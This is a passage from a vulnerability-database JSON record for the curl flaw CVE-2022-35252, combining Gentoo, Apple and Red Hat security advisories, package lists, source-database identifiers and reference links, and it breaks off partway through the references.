\n\nImpact\n=====\nPlease review the referenced CVE identifiers for details. \n\nWorkaround\n=========\nThere is no known workaround at this time. \n\nResolution\n=========\nAll curl users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=net-misc/curl-7.86.0\"\n\nReferences\n=========\n[ 1 ] CVE-2021-22922\n https://nvd.nist.gov/vuln/detail/CVE-2021-22922\n[ 2 ] CVE-2021-22923\n https://nvd.nist.gov/vuln/detail/CVE-2021-22923\n[ 3 ] CVE-2021-22925\n https://nvd.nist.gov/vuln/detail/CVE-2021-22925\n[ 4 ] CVE-2021-22926\n https://nvd.nist.gov/vuln/detail/CVE-2021-22926\n[ 5 ] CVE-2021-22945\n https://nvd.nist.gov/vuln/detail/CVE-2021-22945\n[ 6 ] CVE-2021-22946\n https://nvd.nist.gov/vuln/detail/CVE-2021-22946\n[ 7 ] CVE-2021-22947\n https://nvd.nist.gov/vuln/detail/CVE-2021-22947\n[ 8 ] CVE-2022-22576\n https://nvd.nist.gov/vuln/detail/CVE-2022-22576\n[ 9 ] CVE-2022-27774\n https://nvd.nist.gov/vuln/detail/CVE-2022-27774\n[ 10 ] CVE-2022-27775\n https://nvd.nist.gov/vuln/detail/CVE-2022-27775\n[ 11 ] CVE-2022-27776\n https://nvd.nist.gov/vuln/detail/CVE-2022-27776\n[ 12 ] CVE-2022-27779\n https://nvd.nist.gov/vuln/detail/CVE-2022-27779\n[ 13 ] CVE-2022-27780\n https://nvd.nist.gov/vuln/detail/CVE-2022-27780\n[ 14 ] CVE-2022-27781\n https://nvd.nist.gov/vuln/detail/CVE-2022-27781\n[ 15 ] CVE-2022-27782\n https://nvd.nist.gov/vuln/detail/CVE-2022-27782\n[ 16 ] CVE-2022-30115\n https://nvd.nist.gov/vuln/detail/CVE-2022-30115\n[ 17 ] CVE-2022-32205\n https://nvd.nist.gov/vuln/detail/CVE-2022-32205\n[ 18 ] CVE-2022-32206\n https://nvd.nist.gov/vuln/detail/CVE-2022-32206\n[ 19 ] CVE-2022-32207\n https://nvd.nist.gov/vuln/detail/CVE-2022-32207\n[ 20 ] CVE-2022-32208\n https://nvd.nist.gov/vuln/detail/CVE-2022-32208\n[ 21 ] CVE-2022-32221\n https://nvd.nist.gov/vuln/detail/CVE-2022-32221\n[ 22 ] CVE-2022-35252\n https://nvd.nist.gov/vuln/detail/CVE-2022-35252\n[ 23 ] CVE-2022-35260\n https://nvd.nist.gov/vuln/detail/CVE-2022-35260\n[ 24 ] CVE-2022-42915\n https://nvd.nist.gov/vuln/detail/CVE-2022-42915\n[ 25 ] CVE-2022-42916\n https://nvd.nist.gov/vuln/detail/CVE-2022-42916\n\nAvailability\n===========\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n https://security.gentoo.org/glsa/202212-01\n\nConcerns?\n========\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n======\nCopyright 2022 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttps://creativecommons.org/licenses/by-sa/2.5\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\nAPPLE-SA-2023-01-23-5 macOS Monterey 12.6.3\n\nmacOS Monterey 12.6.3 addresses the following issues. \nInformation about the security content is also available at\nhttps://support.apple.com/HT213604. \n\nAppleMobileFileIntegrity\nAvailable for: macOS Monterey\nImpact: An app may be able to access user-sensitive data\nDescription: This issue was addressed by enabling hardened runtime. \nCVE-2023-23499: Wojciech Regu\u0142a (@_r3ggi) of SecuRing\n(wojciechregula.blog)\n\ncurl\nAvailable for: macOS Monterey\nImpact: Multiple issues in curl\nDescription: Multiple issues were addressed by updating to curl\nversion 7.86.0. \nCVE-2022-42915\nCVE-2022-42916\nCVE-2022-32221\nCVE-2022-35260\n\ncurl\nAvailable for: macOS Monterey\nImpact: Multiple issues in curl\nDescription: Multiple issues were addressed by updating to curl\nversion 7.85.0. \nCVE-2022-35252\n\ndcerpc\nAvailable for: macOS Monterey\nImpact: Mounting a maliciously crafted Samba network share may lead\nto arbitrary code execution\nDescription: A buffer overflow issue was addressed with improved\nmemory handling. \nCVE-2023-23513: Dimitrios Tatsis and Aleksandar Nikolic of Cisco\nTalos\n\nDiskArbitration\nAvailable for: macOS Monterey\nImpact: An encrypted volume may be unmounted and remounted by a\ndifferent user without prompting for the password\nDescription: A logic issue was addressed with improved state\nmanagement. \nCVE-2023-23493: Oliver Norpoth (@norpoth) of KLIXX GmbH (klixx.com)\n\nDriverKit\nAvailable for: macOS Monterey\nImpact: An app may be able to execute arbitrary code with kernel\nprivileges\nDescription: A type confusion issue was addressed with improved\nchecks. \nCVE-2022-32915: Tommy Muir (@Muirey03)\n\nIntel Graphics Driver\nAvailable for: macOS Monterey\nImpact: An app may be able to execute arbitrary code with kernel\nprivileges\nDescription: The issue was addressed with improved bounds checks. \nCVE-2023-23507: an anonymous researcher\n\nKernel\nAvailable for: macOS Monterey\nImpact: An app may be able to execute arbitrary code with kernel\nprivileges\nDescription: The issue was addressed with improved memory handling. \nCVE-2023-23504: Adam Doup\u00e9 of ASU SEFCOM\n\nKernel\nAvailable for: macOS Monterey\nImpact: An app may be able to determine kernel memory layout\nDescription: An information disclosure issue was addressed by\nremoving the vulnerable code. \nCVE-2023-23502: Pan ZhenPeng (@Peterpan0927) of STAR Labs SG Pte. (@starlabs_sg)\n\nPackageKit\nAvailable for: macOS Monterey\nImpact: An app may be able to gain root privileges\nDescription: A logic issue was addressed with improved state\nmanagement. \nCVE-2023-23497: Mickey Jin (@patch1t)\n\nScreen Time\nAvailable for: macOS Monterey\nImpact: An app may be able to access information about a user\u2019s\ncontacts\nDescription: A privacy issue was addressed with improved private data\nredaction for log entries. \nCVE-2023-23505: Wojciech Regula of SecuRing (wojciechregula.blog)\n\nWeather\nAvailable for: macOS Monterey\nImpact: An app may be able to bypass Privacy preferences\nDescription: The issue was addressed with improved memory handling. \nCVE-2023-23511: Wojciech Regula of SecuRing (wojciechregula.blog), an\nanonymous researcher\n\nWebKit\nAvailable for: macOS Monterey\nImpact: Processing maliciously crafted web content may lead to\narbitrary code execution\nDescription: The issue was addressed with improved memory handling. \nWebKit Bugzilla: 248268\nCVE-2023-23518: YeongHyeon Choi (@hyeon101010), Hyeon Park\n(@tree_segment), SeOk JEON (@_seokjeon), YoungSung Ahn (@_ZeroSung),\nJunSeo Bae (@snakebjs0107), Dohyun Lee (@l33d0hyun) of Team ApplePIE\nWebKit Bugzilla: 248268\nCVE-2023-23517: YeongHyeon Choi (@hyeon101010), Hyeon Park\n(@tree_segment), SeOk JEON (@_seokjeon), YoungSung Ahn (@_ZeroSung),\nJunSeo Bae (@snakebjs0107), Dohyun Lee (@l33d0hyun) of Team ApplePIE\n\nWindows Installer\nAvailable for: macOS Monterey\nImpact: An app may be able to bypass Privacy preferences\nDescription: The issue was addressed with improved memory handling. \nCVE-2023-23508: Mickey Jin (@patch1t)\n\nAdditional recognition\n\nKernel\nWe would like to acknowledge Nick Stenning of Replicate for their\nassistance. \n\nmacOS Monterey 12.6.3 may be obtained from the Mac App Store or\nApple\u0027s Software Downloads web site:\nhttps://support.apple.com/downloads/\nAll information is also posted on the Apple Security Updates\nweb site: https://support.apple.com/en-us/HT201222. \n\nThe following advisory data is extracted from:\n\nhttps://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0428.json\n\nRed Hat officially shut down their mailing list notifications October 10, 2023. Due to this, Packet Storm has recreated the below data as a reference point to raise awareness. It must be noted that due to an inability to easily track revision updates without crawling Red Hat\u0027s archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment. Summary:\n\nRed Hat Advanced Cluster Management for Kubernetes 2.6.6 General\nAvailability release images, which fix security issues and update container\nimages. Description:\n\nRed Hat Advanced Cluster Management for Kubernetes 2.6.6 images\n\nRed Hat Advanced Cluster Management for Kubernetes provides the\ncapabilities to address common challenges that administrators and site\nreliability engineers face as they work across a range of public and\nprivate cloud environments. Clusters and applications are all visible and\nmanaged from a single console\u2014with security policy built in. \n\nThis advisory contains the container images for Red Hat Advanced Cluster\nManagement for Kubernetes, which fix several bugs. See the following\nRelease Notes documentation, which will be updated shortly for this\nrelease, for additional details about this release:\n\nhttps://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.6/html/release_notes/\n\nSecurity Fix(es):\n* CVE-2023-28856 redis: Insufficient validation of HINCRBYFLOAT command\n* CVE-2023-32314 vm2: Sandbox Escape\n* CVE-2023-32313 vm2: Inspect Manipulation\n\n3. Solution:\n\nFor Red Hat Advanced Cluster Management for Kubernetes, see the following\ndocumentation for details on how to install the images:\n\nhttps://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.6/html/install/installing#installing-while-connected-online\n\n4. Bugs fixed (https://bugzilla.redhat.com/):\n\n2187525 - CVE-2023-28856 redis: Insufficient validation of HINCRBYFLOAT command\n2208376 - CVE-2023-32314 vm2: Sandbox Escape\n2208377 - CVE-2023-32313 vm2: Inspect Manipulation\n\n5. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n==================================================================== \nRed Hat Security Advisory\n\nSynopsis: Low: curl security update\nAdvisory ID: RHSA-2023:2478-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://access.redhat.com/errata/RHSA-2023:2478\nIssue date: 2023-05-09\nCVE Names: CVE-2022-35252 CVE-2022-43552\n====================================================================\n1. Summary:\n\nAn update for curl is now available for Red Hat Enterprise Linux 9. \n\nRed Hat Product Security has rated this update as having a security impact\nof Low. A Common Vulnerability Scoring System (CVSS) base score, which\ngives a detailed severity rating, is available for each vulnerability from\nthe CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux AppStream (v. 9) - aarch64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux BaseOS (v. 9) - aarch64, ppc64le, s390x, x86_64\n\n3. Description:\n\nThe curl packages provide the libcurl library and the curl utility for\ndownloading files from servers using various protocols, including HTTP,\nFTP, and LDAP. \n\nSecurity Fix(es):\n\n* curl: Incorrect handling of control code characters in cookies\n(CVE-2022-35252)\n\n* curl: Use-after-free triggered by an HTTP proxy deny response\n(CVE-2022-43552)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\nAdditional Changes:\n\nFor detailed information on changes in this release, see the Red Hat\nEnterprise Linux 9.2 Release Notes linked from the References section. \n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n2120718 - CVE-2022-35252 curl: Incorrect handling of control code characters in cookies\n2152652 - CVE-2022-43552 curl: Use-after-free triggered by an HTTP proxy deny response\n\n6. Package List:\n\nRed Hat Enterprise Linux AppStream (v. 9):\n\naarch64:\ncurl-debuginfo-7.76.1-23.el9.aarch64.rpm\ncurl-debugsource-7.76.1-23.el9.aarch64.rpm\ncurl-minimal-debuginfo-7.76.1-23.el9.aarch64.rpm\nlibcurl-debuginfo-7.76.1-23.el9.aarch64.rpm\nlibcurl-devel-7.76.1-23.el9.aarch64.rpm\nlibcurl-minimal-debuginfo-7.76.1-23.el9.aarch64.rpm\n\nppc64le:\ncurl-debuginfo-7.76.1-23.el9.ppc64le.rpm\ncurl-debugsource-7.76.1-23.el9.ppc64le.rpm\ncurl-minimal-debuginfo-7.76.1-23.el9.ppc64le.rpm\nlibcurl-debuginfo-7.76.1-23.el9.ppc64le.rpm\nlibcurl-devel-7.76.1-23.el9.ppc64le.rpm\nlibcurl-minimal-debuginfo-7.76.1-23.el9.ppc64le.rpm\n\ns390x:\ncurl-debuginfo-7.76.1-23.el9.s390x.rpm\ncurl-debugsource-7.76.1-23.el9.s390x.rpm\ncurl-minimal-debuginfo-7.76.1-23.el9.s390x.rpm\nlibcurl-debuginfo-7.76.1-23.el9.s390x.rpm\nlibcurl-devel-7.76.1-23.el9.s390x.rpm\nlibcurl-minimal-debuginfo-7.76.1-23.el9.s390x.rpm\n\nx86_64:\ncurl-debuginfo-7.76.1-23.el9.i686.rpm\ncurl-debuginfo-7.76.1-23.el9.x86_64.rpm\ncurl-debugsource-7.76.1-23.el9.i686.rpm\ncurl-debugsource-7.76.1-23.el9.x86_64.rpm\ncurl-minimal-debuginfo-7.76.1-23.el9.i686.rpm\ncurl-minimal-debuginfo-7.76.1-23.el9.x86_64.rpm\nlibcurl-debuginfo-7.76.1-23.el9.i686.rpm\nlibcurl-debuginfo-7.76.1-23.el9.x86_64.rpm\nlibcurl-devel-7.76.1-23.el9.i686.rpm\nlibcurl-devel-7.76.1-23.el9.x86_64.rpm\nlibcurl-minimal-debuginfo-7.76.1-23.el9.i686.rpm\nlibcurl-minimal-debuginfo-7.76.1-23.el9.x86_64.rpm\n\nRed Hat Enterprise Linux BaseOS (v. 9):\n\nSource:\ncurl-7.76.1-23.el9.src.rpm\n\naarch64:\ncurl-7.76.1-23.el9.aarch64.rpm\ncurl-debuginfo-7.76.1-23.el9.aarch64.rpm\ncurl-debugsource-7.76.1-23.el9.aarch64.rpm\ncurl-minimal-7.76.1-23.el9.aarch64.rpm\ncurl-minimal-debuginfo-7.76.1-23.el9.aarch64.rpm\nlibcurl-7.76.1-23.el9.aarch64.rpm\nlibcurl-debuginfo-7.76.1-23.el9.aarch64.rpm\nlibcurl-minimal-7.76.1-23.el9.aarch64.rpm\nlibcurl-minimal-debuginfo-7.76.1-23.el9.aarch64.rpm\n\nppc64le:\ncurl-7.76.1-23.el9.ppc64le.rpm\ncurl-debuginfo-7.76.1-23.el9.ppc64le.rpm\ncurl-debugsource-7.76.1-23.el9.ppc64le.rpm\ncurl-minimal-7.76.1-23.el9.ppc64le.rpm\ncurl-minimal-debuginfo-7.76.1-23.el9.ppc64le.rpm\nlibcurl-7.76.1-23.el9.ppc64le.rpm\nlibcurl-debuginfo-7.76.1-23.el9.ppc64le.rpm\nlibcurl-minimal-7.76.1-23.el9.ppc64le.rpm\nlibcurl-minimal-debuginfo-7.76.1-23.el9.ppc64le.rpm\n\ns390x:\ncurl-7.76.1-23.el9.s390x.rpm\ncurl-debuginfo-7.76.1-23.el9.s390x.rpm\ncurl-debugsource-7.76.1-23.el9.s390x.rpm\ncurl-minimal-7.76.1-23.el9.s390x.rpm\ncurl-minimal-debuginfo-7.76.1-23.el9.s390x.rpm\nlibcurl-7.76.1-23.el9.s390x.rpm\nlibcurl-debuginfo-7.76.1-23.el9.s390x.rpm\nlibcurl-minimal-7.76.1-23.el9.s390x.rpm\nlibcurl-minimal-debuginfo-7.76.1-23.el9.s390x.rpm\n\nx86_64:\ncurl-7.76.1-23.el9.x86_64.rpm\ncurl-debuginfo-7.76.1-23.el9.i686.rpm\ncurl-debuginfo-7.76.1-23.el9.x86_64.rpm\ncurl-debugsource-7.76.1-23.el9.i686.rpm\ncurl-debugsource-7.76.1-23.el9.x86_64.rpm\ncurl-minimal-7.76.1-23.el9.x86_64.rpm\ncurl-minimal-debuginfo-7.76.1-23.el9.i686.rpm\ncurl-minimal-debuginfo-7.76.1-23.el9.x86_64.rpm\nlibcurl-7.76.1-23.el9.i686.rpm\nlibcurl-7.76.1-23.el9.x86_64.rpm\nlibcurl-debuginfo-7.76.1-23.el9.i686.rpm\nlibcurl-debuginfo-7.76.1-23.el9.x86_64.rpm\nlibcurl-minimal-7.76.1-23.el9.i686.rpm\nlibcurl-minimal-7.76.1-23.el9.x86_64.rpm\nlibcurl-minimal-debuginfo-7.76.1-23.el9.i686.rpm\nlibcurl-minimal-debuginfo-7.76.1-23.el9.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2022-35252\nhttps://access.redhat.com/security/cve/CVE-2022-43552\nhttps://access.redhat.com/security/updates/classification/#low\nhttps://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/9/html/9.2_release_notes/index\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2023 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBZFo0V9zjgjWX9erEAQhmTw/9FUwLCGRKCmddNVTMAaay54EPggJFOPKx\nnN06YIqiK5arkX4SD58YZrX9J0gUZcwGs6s5WO35pG3F+qJXhe8E8fbzavqRG5NB\noxG+pDC5+6xQxK41tkuLYJoUhF1w4yG8SuMSzroLcpbut/MAjKGGw4qgyNGit1Su\nxFGrDTyFxtj+tUZIQCil0HAqlXswQ7G2ukB9kQBpxNRfR0V2ANfmfkkGj8+xWauh\nL1PcaDezNWgAbgWbuf3mHNiwDMxWsNfcwCbx3P8sF+vRe7q5RdIFNL1oXJkPxQVy\nC6L29KcaLYxToNmUNyrOncWAj8KSlrDngVq3NXnG34lVzqz2t/ouc/0lX4Jc9qTL\nmGwYoXvlTqQgV4hGQPfDufApaukxgZfcSidSfqlNt1amYYNiYcvIyf15dht87ipB\n27ahZWDKvunB4gqMG62XNHyiu9bKmDCyL57ggUBt3wxJ7H9M/OgjsI7C/i/10SMT\nD75GjYaU2TWyGLd4SvbV6/3pA3zAZ0Ffqc66uANwfBXC7jFd2/ykEBir3vJYTq17\nr2YWYgH2sma5kwb7ZHQhLKk+N2a0g1KX+Mr0V2wJ+yAYwkbz6wu/BVDXstBFkumJ\n/iKmtOn0Mk07wo/3wvWu5M4tk4kZzmLzs1/ybH3GWOUbFUxbqgOos3/0Vi/uSW88\nYxf4bV/uBmU=HlZ2\n-----END PGP SIGNATURE-----\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://listman.redhat.com/mailman/listinfo/rhsa-announce\n. Description:\n\nVolSync is a Kubernetes operator that enables asynchronous replication of\npersistent volumes within a cluster, or across clusters. After deploying\nthe VolSync operator, it can create and maintain copies of your persistent\ndata. \n\nFor more information about VolSync, see:\n\nhttps://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.7/html/add-ons/add-ons-overview#volsync\n\nor the VolSync open source community website at:\nhttps://volsync.readthedocs.io/en/stable/. \n\nSecurity fix(es): * CVE-2023-3089 openshift: OCP \u0026 FIPS mode\n\n3. Bugs fixed (https://bugzilla.redhat.com/):\n\n2212085 - CVE-2023-3089 openshift: OCP \u0026 FIPS mode\n\n5",
"sources": [
{
"db": "NVD",
"id": "CVE-2022-35252"
},
{
"db": "VULHUB",
"id": "VHN-428403"
},
{
"db": "VULMON",
"id": "CVE-2022-35252"
},
{
"db": "PACKETSTORM",
"id": "168239"
},
{
"db": "PACKETSTORM",
"id": "170303"
},
{
"db": "PACKETSTORM",
"id": "170697"
},
{
"db": "PACKETSTORM",
"id": "170698"
},
{
"db": "PACKETSTORM",
"id": "176746"
},
{
"db": "PACKETSTORM",
"id": "172378"
},
{
"db": "PACKETSTORM",
"id": "172587"
},
{
"db": "PACKETSTORM",
"id": "172195"
},
{
"db": "PACKETSTORM",
"id": "174080"
}
],
"trust": 1.89
},
"external_ids": {
"_id": null,
"data": [
{
"db": "NVD",
"id": "CVE-2022-35252",
"trust": 2.7
},
{
"db": "HACKERONE",
"id": "1613943",
"trust": 1.7
},
{
"db": "PACKETSTORM",
"id": "168239",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-202208-4523",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "170698",
"trust": 0.7
},
{
"db": "AUSCERT",
"id": "ESB-2022.4343",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.6333",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.4375",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2023.3732",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2023.2163",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2023.3143",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2023.3060",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.4374",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-428403",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2022-35252",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "170303",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "170697",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "176746",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "172378",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "172587",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "172195",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "174080",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-428403"
},
{
"db": "VULMON",
"id": "CVE-2022-35252"
},
{
"db": "PACKETSTORM",
"id": "168239"
},
{
"db": "PACKETSTORM",
"id": "170303"
},
{
"db": "PACKETSTORM",
"id": "170697"
},
{
"db": "PACKETSTORM",
"id": "170698"
},
{
"db": "PACKETSTORM",
"id": "176746"
},
{
"db": "PACKETSTORM",
"id": "172378"
},
{
"db": "PACKETSTORM",
"id": "172587"
},
{
"db": "PACKETSTORM",
"id": "172195"
},
{
"db": "PACKETSTORM",
"id": "174080"
},
{
"db": "CNNVD",
"id": "CNNVD-202208-4523"
},
{
"db": "NVD",
"id": "CVE-2022-35252"
}
]
},
"id": "VAR-202208-2263",
"iot": {
"_id": null,
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-428403"
}
],
"trust": 0.01
},
"last_update_date": "2026-03-09T23:13:33.194000Z",
"patch": {
"_id": null,
"data": [
{
"title": "curl Security vulnerabilities",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=206230"
},
{
"title": "Debian CVElist Bug Report Logs: curl: CVE-2022-35252: control code in cookie denial of service",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=f071eb46e3ac96bc3c50d0406c2d0685"
},
{
"title": "",
"trust": 0.1,
"url": "https://github.com/JtMotoX/docker-trivy "
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2022-35252"
},
{
"db": "CNNVD",
"id": "CNNVD-202208-4523"
}
]
},
"problemtype_data": {
"_id": null,
"data": [
{
"problemtype": "NVD-CWE-noinfo",
"trust": 1.0
},
{
"problemtype": "CWE-20",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2022-35252"
}
]
},
"references": {
"_id": null,
"data": [
{
"trust": 1.8,
"url": "https://security.gentoo.org/glsa/202212-01"
},
{
"trust": 1.7,
"url": "https://security.netapp.com/advisory/ntap-20220930-0005/"
},
{
"trust": 1.7,
"url": "https://support.apple.com/kb/ht213603"
},
{
"trust": 1.7,
"url": "https://support.apple.com/kb/ht213604"
},
{
"trust": 1.7,
"url": "http://seclists.org/fulldisclosure/2023/jan/20"
},
{
"trust": 1.7,
"url": "http://seclists.org/fulldisclosure/2023/jan/21"
},
{
"trust": 1.7,
"url": "https://hackerone.com/reports/1613943"
},
{
"trust": 1.7,
"url": "https://lists.debian.org/debian-lts-announce/2023/01/msg00028.html"
},
{
"trust": 1.0,
"url": "https://access.redhat.com/security/cve/cve-2022-35252"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-35252"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/170698/apple-security-advisory-2023-01-23-6.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2023.3143"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2023.2163"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2023.3060"
},
{
"trust": 0.6,
"url": "https://cxsecurity.com/cveshow/cve-2022-35252/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2023.3732"
},
{
"trust": 0.6,
"url": "https://support.apple.com/en-us/ht213604"
},
{
"trust": 0.6,
"url": "https://vigilance.fr/vulnerability/curl-denial-of-service-via-cookies-control-codes-39156"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/168239/ubuntu-security-notice-usn-5587-1.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.4374"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.4343"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.4375"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.6333"
},
{
"trust": 0.4,
"url": "https://listman.redhat.com/mailman/listinfo/rhsa-announce"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/team/contact/"
},
{
"trust": 0.4,
"url": "https://bugzilla.redhat.com/):"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2022-43552"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/articles/11258"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-43552"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-35260"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-42916"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-42915"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-32221"
},
{
"trust": 0.2,
"url": "https://support.apple.com/downloads/"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-23497"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-23505"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-23499"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-23508"
},
{
"trust": 0.2,
"url": "https://www.apple.com/support/security/pgp/"
},
{
"trust": 0.2,
"url": "https://support.apple.com/en-us/ht201222."
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/updates/classification/#moderate"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/updates/classification/#low"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/team/key/"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2023-0361"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2023-27535"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-36227"
},
{
"trust": 0.1,
"url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1018831"
},
{
"trust": 0.1,
"url": "https://github.com/jtmotox/docker-trivy"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/curl/7.58.0-2ubuntu3.20"
},
{
"trust": 0.1,
"url": "https://ubuntu.com/security/notices/usn-5587-1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/curl/7.81.0-1ubuntu1.4"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/curl/7.68.0-1ubuntu2.13"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-22922"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-27782"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-27776"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-27779"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-30115"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-22576"
},
{
"trust": 0.1,
"url": "https://security.gentoo.org/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-22925"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-22926"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-27781"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-22945"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-32208"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-32206"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-32207"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-27774"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-27775"
},
{
"trust": 0.1,
"url": "https://bugs.gentoo.org."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-32205"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-27780"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-22923"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-22946"
},
{
"trust": 0.1,
"url": "https://creativecommons.org/licenses/by-sa/2.5"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-22947"
},
{
"trust": 0.1,
